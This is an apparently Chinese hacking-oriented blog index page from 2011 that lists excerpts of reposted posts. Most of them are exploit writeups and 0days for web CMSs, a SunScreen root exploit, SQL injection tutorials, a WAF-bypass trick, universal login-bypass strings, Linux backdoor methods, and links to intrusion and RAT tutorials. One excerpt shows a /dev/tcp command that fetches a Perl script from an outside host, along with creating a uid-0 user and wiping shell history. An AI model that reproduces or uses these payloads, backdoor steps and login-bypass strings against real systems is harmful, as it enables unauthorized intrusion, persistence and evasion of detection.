自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

叱诧冰子 ′

不是在沉默中爆发,就是在沉默中死亡

  • 博客(38)
  • 收藏
  • 关注

原创 继续换博客

<br />  继续换博客咯,  这个博客也有很多限制    改用网易博客了。   http://chinahacker.blog.163.com/

2011-02-06 22:02:00 487

转载 思科交换机配置命令

<br />简写命令                                                    完整命令<br />1 用户模式:                                                 用户模式:<br />switch>                                                        switch><br /><br />2 特权模式:                            

2011-01-30 19:53:00 884

转载 思科路由器配置命令

<br />简写命令 完整命令 <br /><br />1 用户模式: 用户模式:<br />Router> Router><br /><br />2 特权模式: 特权模式:<br />Router>en Router>enable<br />Router# Router#<br /><br />3 全局配置模式 全局配置模式<br />Router#conf t Router#config terminal<br />Router(config)# Router(config)#<br /><br />4

2011-01-30 19:53:00 3133

转载 BeeSns微博系统V0.2提升权限oday+exp

<br />发布日期:2011-1.27<br />发布作者:子仪<br />影响版本:BeeSns V0.2<br />官方地址: http://www.beesns.com/<br />漏洞描述:IP过滤不严,导致用户可以提交恶意参数提升自身权限 <br />这套微博系统风格挺不错的,个人比较喜欢,看代码是发现一些问题,直接看代码吧 01// 获取客户端IP02functiongetip() { 03 if(isset($_SERVER)) { 04  if(isset($_SERVER[HTTP_X_

2011-01-30 19:52:00 899

转载 ComercioPlus 5.6 SQL注入漏洞

<br />ComercioPlus是一款使用PHP编写的虚拟商店系统,ComercioPlus 5.6版中的pp_productos.php文件存在 SQL注入漏洞,可能导致敏感信息泄露。 [+]info:<br />~~~~~~~~~<br /># Exploit Title: Comerciosonline CMS SQLi<br /># Google Dork: allintext: " Servicio ofrecido por ComerciosOnLine "<br /># Date: 27/

2011-01-30 19:51:00 641

转载 某酒业网会员注册上传漏洞

<br />发布日期:2011-01.29<br />发布作者:xiaokis<br />漏洞类型:文件上传<br />漏洞描述:<br />文件:sub_upload.asp<br />01 <!--#include file="UPLOAD.INC"--><br />02 <%if session("admin_name")="" and Session("ME_name")="" then%><br />03 <style type="text/css"><br />04 <style type="t

2011-01-30 19:51:00 1441

转载 SunScreen Firewall缓冲溢出漏洞

<br />SunScreen是sun公司一款防火墙,它运行在sun操作系统的3858端口上,可以通过一个java服务程序进行远程管理。这个java服务包含了大量的缓冲区溢出漏洞(至少两个),此外,如果攻击者可以上传文件到系统上还能够执行任意代码。下面这个exploit上传至远程服务器上就可以以root权限执行。<br /> <br />001 /* <br />002   <br />003 Sun Microsystems SunScreen Firewall Root Exploit <br />00

2011-01-28 20:07:00 397

转载 雨乔(YuQa)网络信息反馈系统 YuQaIFS V1.0 漏洞0day

<br />发布作者:f4tb0y<br /><br />影响版本:YuQaIFS V1.0<br /><br />漏洞类型:设计缺陷<br />漏洞描述:出现漏洞的文件是YuQaIFS_Save.asp直接把提交的数据写入了数据库,毫无过滤。<br /><br /><br /><br /><br />主页面www.xxx.com/xx/index.asp(xx为此系统根目录)<br /><br /><br />出现漏洞的文件是YuQaIFS_Save.asp直接把提交的数据写入了数据库,毫无过滤。<br

2011-01-28 11:56:00 632

转载 Phpcms V9 网站管理系统 SQL 盲注入漏洞

<br />=================================================================<br />Phpcms V9 BLind SQL Injection Vulnerability<br />非常简单的英文,连我这英语不及格的都看得懂…… 囧~ 就不翻译了……<br />=================================================================<br />Phpcms V9 网站管理系统 SQ

2011-01-28 11:55:00 1591

转载 Linux基本命令

<br />Linux基本命令:<br />who查看当前user<br />ps aux (我经常多一个‘-’,有一行错误信息)<br />netstat (具体man or info to CC)<br />shutdown reboot关机命令<br />shutdown语法:<br />/sbin/shutdown[-t秒][-arkhncfF时间][警告信息]<br />eg:<br />/sbin/shutdown -h 10 'Server will be shutdowned after 1

2011-01-27 21:28:00 278

转载 MySQL 的主要特征

<br />下表描述MySQL一些重要的特征: 使用核心线程的完全多线程。这意味着它能很容易地利用多CPU(如果有)。 C 、C++、 Eiffel 、 Java、 Perl、 PHP、Python、和 TCL  API。 可运行在不同的平台上。 多种列类型:1、 2、 3、4、和 8 字节长度的有符号/无符号整数、FLOAT、DOUBLE、CHAR、VARCHAR、TEXT、BLOB、DATE、TIME、DATETIME、TIMESTAMP、YEAR、SET和ENUM类型。 利用一个优化的一遍扫描多重联结

2011-01-27 21:27:00 611

转载 SQL语句大全目录

<br />一、基础<br />  1、说明:创建数据库<br />  创建之前判断该数据库是否存在<br />  if exists (select * from sys.databases where name='databaseName') <br />  drop database 'databaseName'<br />  go<br />  Create DATABASE database-name<br />  2、说明:删除数据库<br />  drop database dbname<br

2011-01-27 21:26:00 348

转载 风神新闻管理静态版1.7漏洞

<br />发布日期:2011-01.26<br />发布作者:LinkEr<br />影响版本:V1.7静态版 <br />官方网站:http://www.strongfire.cn/<br />漏洞类型:设计缺陷<br />漏洞描述:风神新闻管理静态版1.7存在多处漏洞。<br />#1.1 <br />后台验证文件 wwwroot/admin/islogin.asp<br />===============================================================

2011-01-27 15:49:00 543

转载 DEDECMS 会员任意删除文件漏洞

<br />发布日期:2011-01.25<br />发布作者:心灵<br />影响版本:DEDECMS <br />官方网站:http://www.dedecms.com<br />漏洞类型:设计缺陷<br />漏洞描述:<br /> <br />edit_fullinfo.php<br />if($dopost=='save') //edit_fullinfo.php?dopost=save 就来到这步了    {    $oldspacelogo=(empty($oldspacelogo))? ""

2011-01-27 15:47:00 1342

转载 VBS脚本技术手册(3)

<br />忽略对只读属性(别名,压缩或目录)所作的改变. 当设置属性时,应首先阅读当前属性,然后按要求改变个别属性,最后反写属性.<br />例子:1:<br />Dim fso, MyFile<br />Set fso = CreateObject("Scripting.FileSystemObject")<br />set MyFile =fso.GetFile("c:/test.txt")<br />msgbox MyFile.Attributes<br />2:<br />Dim fso, MyF

2011-01-25 13:52:00 1357

转载 VBS脚本技术手册(2)

<br />六、输入函数:InputBox(提示[,标题][,默认][,x位置][,位置][,helpfile,context])<br />prompt 字符串表达式,作为消息显示在对话框中。如果 prompt 中包含多个行,则可在各行之间用回车符 (Chr(13))、换行符 (Chr(10)) 或回车换行符的组合 (Chr(13) & Chr(10)) 以分隔各行。 <br />Title 显示在对话框标题栏中的字符串表达式。如果省略 title,则应用程序的名称将显示在标题栏中。 <br />Defa

2011-01-25 13:47:00 692

转载 VBS脚本技术手册(1)

<br />一、时间与日期函数<br />01:Date函数<br />例子:Msgbox date<br />将会显示“2009-03-13”<br />02:time函数<br />例子 :Msgbox time<br />将显示“15:21:38”<br />03:now函数<br />例子Msgbox now<br />将显示“2009-03-13 15:23:13”<br />04:year(),month(),day(),hour(),minute(),second()函数,参数是时间表达式,<

2011-01-25 13:45:00 1476

转载 /*!select*/ 突破防注入

<br />作者:meao<br /><br />昨天在检测一个外国PHP网站时<br />在id=255后加'出现forbidden<br />于是我and 1=1正常   and 1=2出错<br />说明肯定有注入<br />接着我order by猜出字段<br />然后union select 1,2,3,4 //悲剧的又出现了forbidden<br />肯定是做了过滤了<br />后来构造了语句id=-255+union+/*!select*/+1,2,3,4<br /><br />原理:<br

2011-01-25 13:40:00 539

转载 脚本渗透精华

第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。<br />数字型:and 1=1 and 1=2 判断是否存在注入<br />字符型:' and '1'='1 ' and '1'='2<br />搜索型: 关键字%' and 1=1 and '%'='% 关键字%' and 1=2 and '%'='%<br />IIS报错情况下使用: <br />and

2011-01-24 09:40:00 345

转载 各种万能密码

<br />asp aspx万能密码<br /><br />1:"or "a"="a<br />2: ')or('a'='a <br />3:or 1=1--<br />4:'or 1=1--<br />5:a'or' 1=1--<br />6:"or 1=1--<br />7:'or'a'='a<br />8:"or"="a'='a<br />9:'or''='<br />10:'or'='or'<br />11:   1 or '1'='1'=1<br />12:   1 or '1'='1' or 1

2011-01-24 09:39:00 1001

转载 linux留本地后门的方法

<br />看过程 方法一: setuid 方法。:<br />[root@localdomain lib]# ls -l |grep ld-linux<br />lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so<br />lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2<br />[root@localdomain lib]#

2011-01-24 09:31:00 529

转载 大学网站沦陷之Journal报刊系统Fckeditor-0day

<br />影响版本:JournalX 2.0  <br />官方网站:http://www.magtech.com.cn<br />产品介绍:<br />JournalX 2.0率先为出版社/集团、期刊业推出了整体的解决方案。目前已经在遍布全国的600多家杂志社、十几家出版社得到应用。<br />google or baidu 关键字:inurl:volumn/current_abs.shtml<br />因FCKeditor/myconfig.js 过滤不严格导致上传任意格式文件。<br />在Web根

2011-01-24 09:20:00 1538

转载 西部PHP视频教程

[第一期]-西部PHP视频教程第01讲<br />http://u.115.com/file/f2dc208c33[第一期]-西部PHP视频教程第02讲<br />http://u.115.com/file/f2ff14bd52[第一期]-西部PHP视频教程第03讲<br />http://u.115.com/file/f2b819efcf[第一期]-西部PHP视频教程第04讲<br />http://u.115.com/file/f2e1e55134[第一期]-西部PHP视频教程第05讲<br />htt

2011-01-24 09:08:00 935

转载 驭风者安全团队2010年最新全套入侵教程

<br />新手学灰鸽子上线教程<br />ftp://www.ftahk.com/video/xinshoumiangezi.rar<br /><br />3389的密码爆破教程<br />ftp://www.ftahk.com/video/3389bp.rar<br /><br />手工检测网站方法<br />ftp://www.ftahk.com/video/2.rar<br /><br />国内某程序0day下数据库备份拿webshell<br />ftp://www.ftahk.com/video

2011-01-23 12:55:00 689

转载 土耳其的一套渗透教程

<br />http://www.mavi1.org/videolar/joomla.htm<br />http://www.mavi1.org/videolar/root.htm<br />http://www.mavi1.org/videolar/2-6-15.htm<br />http://www.mavi1.org/videolar/2-6-7.htm<br />http://www.mavi1.org/videolar/2-6-9.htm<br />http://www.mavi1.org/vid

2011-01-23 12:53:00 439

转载 精通注册表视频教程

<br />http://cimg.163.com/tech/netSchool/juyi/windows/11.swf <br />http://cimg.163.com/tech/netSchool/juyi/windows/12.swf <br />http://cimg.163.com/tech/netSchool/juyi/windows/13.swf   <br />http://cimg.163.com/tech/netSchool/juyi/windows/14.swf   <br />ht

2011-01-23 12:46:00 772 1

转载 3hooCMS V3.0 XSS+CSRF&EXP

<br />漏洞类型:跨站XSS<br />漏洞描述:XSS:未对提交内容进行过滤,后台查看订单时将执行XSS语句<br />CSRF:未对URL来源进行验证,当管理存在cookie时可执行设定的语句<br /> <br /><br />###################### XSS ######################<br /><br /><style><br />.s1{font-size:0px; color:#FFFFFF; border:0px}<br /></style><br

2011-01-23 12:30:00 375

转载 ARP监听渗透内网的方法

<br />假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆<br />第一步:<br />tracert 61.139.1.1<br />C:/WIN2000/system32>tracert 61.139.1.1<br />Tracing route to HACK-4FJ7EARC [61.139.1.1]<br />over a maximum of 30 hops:<br />1 <10 ms <10 ms <10 ms

2011-01-23 01:09:00 376

转载 Linux下将Tinyxml编译为静态库

<br /> 一个应用需要在linux服务器上运行,不能保证每个服务器都有应用依赖的库,又懒得每个服务器都去安装下,也不太现实,于是就将应用所用到的库全部编译为静态库,直接丢到服务器上跑吧。此为应用调用xml配置文件依赖tinyxml库示例,记录下,备忘。<br />      1.下载tinyxml库,直接从官方下载,http://sourceforge.net/projects/tinyxml/。<br />      2.解压缩下载好的包,我解压缩到test目录下,进入项目目录。<br />     

2011-01-22 09:10:00 741

原创 exploitscanner

<br /><br /> <br /> <br /> <br /> <br /> <br />点击下载

2011-01-22 09:04:00 301

原创 简易旁注大婶器

<br /><br /> <br />点击下载<br /> 

2011-01-22 09:01:00 275

原创 中国砍刀

<br /> <br />点击下载

2011-01-22 08:57:00 518

原创 加密与解密工具新年大礼包2010

<br />加密与解密工具新年大礼包2010<br /><br />New Year Presents 2010 Edition<br /><br />PEDIY & China BCG荣誉出品<br /><br />===============================================================================<br /><br />本光盘主要收集了常用的加密与解密工具,工具来自bbs.pediy.com兄弟们的分享,我们主要是<br /><b

2011-01-22 08:38:00 938

转载 MYSQL提权技巧

转老邪问题对象:有虚拟主机空间商.网站服务器  过程:建立一个表→在表中输入我们的提权内容→出表→完成  1.mysql默认开启3306端口.如果服务器默认密码不设置就是空密码.黑客们就可能利用该弱口令漏洞.来攻击我们的服务器.  2.如果在得到用户名为:root 密码为:(空密码时候),黑客就可以攻击进我们网站的.答案他们利用导出一句话木马.  3.黑客可以得到一个webshell然后.查看网站配置信息.就可以找到这个账号和密码.例如inc.php coon.asp等这些文件  4.虚拟主机提供商,自己给

2011-01-21 13:40:00 477

转载 linux渗透的小技巧

<br />老邪<br /><br />1.无wget nc等下载工具时下载文件<br />exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0/n" >&5 && cat<&5 > c.pl<br /><br />2.Linux添加uid为0的用户<br />useradd -o -u 0 cnbird<br /><br />3.bash去掉history记录<br />export HISTSIZE=0<br />export HIS

2011-01-21 13:39:00 530

转载 脚本入侵讲解-asp注入漏洞

1:注入漏洞<br />------------<br />1.asp手工注入<br />第一步:<br />先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。<br />否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。<br />http://www.hack92.com/hack92.asp?id=1<br />我们在这个地址后面加上单引号’ 然后and 1=1 正确 and 1=2 错误的话就说明存在注入漏

2011-01-21 13:38:00 560

转载 手工PHP注入详解

在这个注入风靡的时代,多少菜鸟拿着工具四处冲锋.如果你不想成为工具的奴隶,不想遇到PHP就退避三舍,不想继续做着ASP的菜鸟之群,不 想......那么请你静下心来, 随我一同走完这次的入侵检测全过程. <br />      相信你必然能有所收获.不只在技术上,更在思路上,更在意识上..判断是否存在注入:首先,PHP和ASP判断注入的方法一样,在一个动态连接后面加上and 1=1,and 1=2看其返回结果即可判断.两次返回结果不相同,即可初步判断为有注入点.   判断字段大小:接下来,对付php猜字段的

2011-01-21 13:37:00 385

转载 php.ini安全模式配置详细解释

php.ini安全模式配置详细解释<br /><br />发布:独自等待<br /><br /><br />PHP本身再老版本有一些问题,比如在 php4.3.10和php5.0.3以前有一些比较严重的bug,所以推荐使用新版。另外,目前闹的轰轰烈烈的SQL Injection也是在PHP上有很多利用方式,所以要保证安全,PHP代码编写是一方面,PHP的配置更是非常关键。我们php手手工安装的,php的默认配置文件在 /usr/local/apache2/conf/php.ini,我们最主要就是要配置php

2011-01-21 13:18:00 318

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除